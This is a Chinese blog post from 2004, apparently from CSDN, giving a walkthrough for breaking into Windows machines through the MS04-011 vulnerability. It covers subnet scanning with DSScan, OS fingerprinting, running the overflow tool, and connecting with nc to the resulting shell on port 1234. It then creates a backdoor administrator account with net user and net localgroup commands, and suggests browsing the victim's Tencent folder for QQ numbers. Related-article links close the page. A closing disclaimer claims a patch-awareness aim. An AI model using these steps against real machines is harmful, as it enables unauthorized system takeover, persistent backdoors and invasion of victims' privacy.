Ms04011漏洞

原创 2004年07月06日 21:29:00

呵呵,大家都应知道这个漏洞吧,哈哈,它好厉害哦。HACKER们利用它来可以得到操作系统的administrators权限,得到系统的shell。不多说别的,看看他们都是入何入侵别人的机器吧。

 

1.  首先,去下载ms04011漏洞溢出的工具,网上有好多哦。

工具中包括了DSScan GetOS, MS04011溢出工具

DSScan:这个工具是用来扫描系统是否有MS04011漏洞的工具,当扫描到目标机器就此漏洞,便会列出它的ip地址,主机名, netbios名称,  还有最重要的就是状态信息. 它可以扫描到在此ip断内所有存活的主机,如果有MS04011漏洞的机器,在状态信息就列出vulnerable,否则为not vulnerable。一般一次扫描64ip地址。

GetOS:其是用来获得操作系统的类型,但必须对方机的139端口开放.

MS04011:其就是用来溢出的工具了.

2.如何溢出

首先用DSScan,在IP断内输入IP, 然后点那个右键头,使其进入右边的框内,可以多选

然后点击开始就可以.例如,我们扫到一个机器的结果为这样

Ip                      hostname           netbios              status

192.168.1.33       You                You                vulnerable

192.168.1.34       haha               haha                not vulnerable

大家可以看到192.168.1.33的机器statusvulnerable,这就说明它存在这ms04011的漏洞。

下面就让我们去溢出它吧,在开始溢出前先要得到对方机器的类型。用Getos来得到

在运行用输入cmd,回车,然后到你的程序路径下,输入getos 192.168.1.33

结果就会出现

[*] Connecting Port 139…..

[*] Sending session request…..

[*] Sending negotiation request….

[*] Sending setup account request….

[*] Successful…….

Remote OS:

-------------

WORKGROUP   这是工作组名

Windows 2000 LAN Manger  

Windows 5.0     这就是操作系统的类型,如果为windows 5.1那么就是xp

好了,我们知道它的类型是2000了,那么我们就马上用 ms04011来溢出吧

先打开两个cmd窗口, 在两个里面同时输入ms04011 0 192.168.1.33 然后一个一个的回车

在一个cmd里会出现

Shellcode size 404

Ret value = 1726  //注意1726才是溢出成功的代码

对于xp系统要用    Ms04011 1 192.168.1.33

3.如何得到机器的shell

要用到最厉害的瑞士军刀了(名称是NC), 哈哈,这个工具可不一般啊,到网上下载吧

然后在cmd内输入nc 192.168.1.33 1234 1234是溢出的端口号.哈哈是不是出现了这样的提示

C:/winnt/system32>

//哈哈,你成功了。你可以对其操作了

 

比如:

Net user haha 123 /add        //在对方机器可以建立名为haha, 密码为123 的用户

Net localgroup administrators haha /add  //使haha列入administrators.

 

当然可以到应用程序的tencent目录里看看MMQQ号啊,以后常联系哦。

 

 

严重声明:不可以利用此方法做非法行为,如发现本人不负任何责任。发表此文的目的在于使大家重视自已系统的安全,常打补丁。在国内有好多的机器存在这样的漏洞,唉!!!!!

 

ms04011漏洞利用工具

  • 2010年06月10日 21:08
  • 182KB
  • 下载

struts2漏洞原理及解决办法

Struts2被曝存在重大远程任意代码执行安全漏洞,影响Struts2全系版本。而对于此次堪比棱镜事件的危害,安全宝指出,众多大型互联网厂商均存在该漏洞,且影响厂商仍在扩大之中。同时漏洞利用代码已经被...
  • zhangzeyuaaa
  • zhangzeyuaaa
  • 2016年12月15日 20:57
  • 13794

PHP 函数漏洞总结

总结了常见的PHP函数漏洞,希望对大家有用
  • qq_31481187
  • qq_31481187
  • 2017年03月09日 20:59
  • 24876

利用CMS漏洞渗透并获取某服务器权限

在phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐...
  • wodafa
  • wodafa
  • 2017年03月14日 14:52
  • 2338

Struts2 最新高危漏洞详解

由于计算机起源于美国,因此很多新兴技术和框架也都出于美国的一些大公司。虽然国内的BAT也在开源技术上有一些贡献,但目前来说还是比较缺少用户来支持。这也就导致了国内大部分互联网公司大量的依赖国外的技术。...
  • m0_37630565
  • m0_37630565
  • 2017年03月13日 20:38
  • 13034

struts2 漏洞分析 及解决办法

1.讨论关于struts 安全问题。 2.黑客文化。 3.如何降低安全漏洞的出现。 4.忠告建议。 题记: 这篇文章本来很早应该和大家见面的,中间由于个人原因调整了系列文...
  • u013851082
  • u013851082
  • 2016年12月16日 14:05
  • 1841

ASP常见漏洞大全

一、SQL注入漏洞 漏洞简介: 程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得...
  • sinat_27042305
  • sinat_27042305
  • 2017年01月07日 19:49
  • 2073

注入漏洞检测关键字

个人从网上和一些教程钟归纳了一些批量搜索注入点的关键字,分享给大家使用,    内容不多,但实用性还是蛮强的,保证能找到注入点,但是有些MD5加密之后不能解开,那也没有办法。有些关键字还可以扩展,寻...
  • dongjunhua
  • dongjunhua
  • 2013年03月01日 22:38
  • 12398

如何寻找安全漏洞之——黑客们如何挖掘漏洞

看到本文的题目你会不会虎躯一震呢?感觉——it’s imposible!,but it is so easy to get in。。。 以前我们总是听到“挖掘漏洞”,“某某公司出现了提权漏洞”,我们...
  • u012260672
  • u012260672
  • 2015年11月16日 15:54
  • 6114

i春秋:警惕IIS6.0站上的解析缺陷绕过上传漏洞

实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.com实验工具:中国菜刀 BurpSuite 实验目的 ...
  • hope_smile
  • hope_smile
  • 2015年06月01日 04:08
  • 8026
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Ms04011漏洞
举报原因:
原因补充:

(最多只允许输入30个字)